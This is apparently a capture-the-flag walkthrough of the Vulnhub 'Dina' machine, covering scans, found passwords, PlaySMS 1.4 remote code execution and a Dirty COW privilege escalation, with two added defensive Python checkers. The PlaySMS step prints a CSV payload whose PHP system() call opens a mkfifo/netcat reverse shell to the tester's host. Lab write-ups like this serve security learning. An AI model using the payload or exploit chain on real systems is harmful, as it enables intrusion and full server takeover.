Another great vulnhub virtual machine for beginners – especially for me :). It was fun to test this machine – so thank you Touhid!
I used nmap and nikto to gather some information.
+ Target IP: 192.168.1.132
+ Target Hostname: dina.lan
+ Target Port: 80
+ Using Encoding: Random URI encoding (non-UTF8)
+ Start Time: 2017-10-18 18:39:12 (GMT2)
+ Server: Apache/2.2.22 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ 7444 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2017-10-18 18:39:39 (GMT2) (27 seconds)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
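To make clear what nikto is flagging in the header findings above, here is an added audit function (my own example, not part of the original write-up and not nikto code) that checks a dict of response headers for the missing hardening headers, the TCN: list marker of MultiViews, the exposed version banner, and decodes the inode and size from a 2.2-style ETag. The sample headers are constructed to mirror the findings; the mtime field of the ETag is arbitrary.

```python
import re

# Constructed sample response headers, modelled on the nikto findings above
# (Apache 2.2.22 banner, TCN: list from MultiViews, 2.2-style ETag).
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "ETag": '"67df7-e22-55bbf2f3c0d00"',   # inode 0x67df7 = 425463, size 0xe22 = 3618
    "TCN": "list",
    "Content-Type": "text/html",
}

# Headers nikto reported as missing on the target, with a sensible value each.
HARDENING_HEADERS = {
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
}

# Apache 2.2's default FileETag (INode MTime Size) renders as "inode-size-mtime",
# every field in hex, which is what lets a scanner recover the inode number.
ETAG_RE = re.compile(r'^(W/)?"([0-9a-f]+)-([0-9a-f]+)-([0-9a-f]+)"$')

def decode_apache_etag(etag):
    """Return (inode, size) decoded from a 2.2-style ETag, or None."""
    m = ETAG_RE.match(etag.strip())
    if not m:
        return None
    return int(m.group(2), 16), int(m.group(3), 16)

def audit_headers(headers):
    """Return a list of findings (strings) for a dict of response headers."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, value in HARDENING_HEADERS.items():
        if name.lower() not in h:
            findings.append(f"missing {name} (suggest: {value})")
    if h.get("tcn", "").lower() == "list":
        findings.append("MultiViews active (TCN: list); set Options -MultiViews")
    decoded = decode_apache_etag(h.get("etag", ""))
    if decoded:
        findings.append(f"ETag leaks inode {decoded[0]} size {decoded[1]}; set FileETag MTime Size")
    server = h.get("server", "")
    if re.search(r"Apache/\d", server):
        findings.append(f"version banner exposed: {server}; set ServerTokens Prod")
    return findings
```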
I checked all the paths above and found some interesting strings on /nothing. The following strings were in a comment in the source code:
#my secret pass
It looks like we found some passwords. Nice. Let's check the other path: /secure. It contains a password-protected backup.zip file. So I tried the passwords above and successfully unpacked it with the password freedom.
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
url : /SecreTSMSgatwayLogin
Okay, check that secret SMS gateway. I tried to log in with the username touhid and the passwords found earlier. The login pair was touhid:diana.
The first thing I usually do when I identify a web application is check exploit-db for available exploits.
PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt
PlaySMS 1.4 - Remote Code Execution | php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion | php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery | php/webapps/30177.txt
This is all I need. Touhid did a great job finding the vulnerabilities in this application. At least 3 different ways to run system commands through the PHP system() function.
All right, it's time to get a remote shell.
Gaining remote shell
I tried to run system commands as described in 42044.txt. I tried for quite a while; a simple nc host port -e /bin/bash didn't work because this netcat was the OpenBSD version, and the "-e" option is missing from the OpenBSD version. After a few minutes of research I had created a csv file with the following content:
$cmd='rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.109 7777 > /tmp/f 2>&1';system($cmd); ?>,2,3
Luckily I got shell!!!
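On the defensive side, the import.php issue comes down to CSV cells being treated as code rather than data. The following added example (my own code, not PlaySMS's; the column names are assumed from the phonebook CSV layout the exploit targets) is a strict allowlist validator that rejects any cell carrying a PHP or script tag, or characters outside what a phonebook field needs, run over a constructed two-row CSV.

```python
import csv
import io
import re

# Constructed sample import: one legitimate row and one row whose first cell
# carries an inert PHP open tag, standing in for the payload row shown above.
SAMPLE_CSV = """Name,Mobile,Email,Group code,Tags
Alice Example,+36201234567,alice@example.net,sales,vip
<?php echo 1; ?>,2,3
"""

# Anything that could be picked up as code by a template or eval step.
PHP_TAG_RE = re.compile(r"<\?|\?>|<%|<script", re.IGNORECASE)
# Per-column allowlists (assumed column names); empty is allowed where optional.
FIELD_RULES = {
    "Name": re.compile(r"^[\w .'-]{1,64}$"),
    "Mobile": re.compile(r"^\+?\d{6,15}$"),
    "Email": re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$|^$"),
    "Group code": re.compile(r"^[A-Za-z0-9_-]{0,32}$"),
    "Tags": re.compile(r"^[A-Za-z0-9_ ,-]{0,128}$"),
}

def validate_row(row):
    """Return a list of problems for one parsed CSV row (empty if clean)."""
    problems = []
    for field, rule in FIELD_RULES.items():
        value = row.get(field)
        if value is None:
            problems.append(f"{field}: missing column")
            continue
        if PHP_TAG_RE.search(value):
            problems.append(f"{field}: contains code tag")
        elif not rule.match(value):
            problems.append(f"{field}: rejected by allowlist")
    return problems

def validate_import(text):
    """Parse CSV text; return (accepted_rows, [(line_no, problems), ...])."""
    reader = csv.DictReader(io.StringIO(text))
    accepted, rejected = [], []
    for lineno, row in enumerate(reader, start=2):   # line 1 is the header
        problems = validate_row({k: (v or "") for k, v in row.items() if k})
        if problems:
            rejected.append((lineno, problems))
        else:
            accepted.append(row)
    return accepted, rejected
```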
Running whoami told me that my current user is www-data. Okay, check the system. Running netstat -tlpn showed a mysql server running on this machine. In the SecreTSMSgatwayLogin directory was a config.php file. I checked this file and found the login and password pair for the database.
Then I selected the playsms database, found the user table and the password hashes:
| admin_78f3198ce97ae2bdddb15cc25d559c6f |
The findmyhash command didn't find the password in the public databases. I was too lazy to fire up oclhashcat and brute-force the hash, so I moved on.
I could not get higher privileges through the mysql system command, so I needed another way to get root access.
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
Okay let’s invite our dirty friend….
I am too lazy…. Really… At this point I knew what to use…. I had a little experience from earlier vulnhub machines and used the following exploit from exploit-db to escalate privileges: 40839.c
I was lucky: gcc was present on that machine and the exploit compiled without errors.
After a few minutes the root user firefart had been created with the password 1234. Okay, check the root directory for the flag.
firefart@Dina:/# cat /root/flag.txt
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))
root password is : hello@3210
easy one …..but hard to guess…..
but i think u dont need root password……
u already have root shelll….
FLAG : 22d06624cd604a0626eb5a2992a6f2e6
Thank you Touhid M.Shaikh for the fun. It was a pleasure to play with this machine.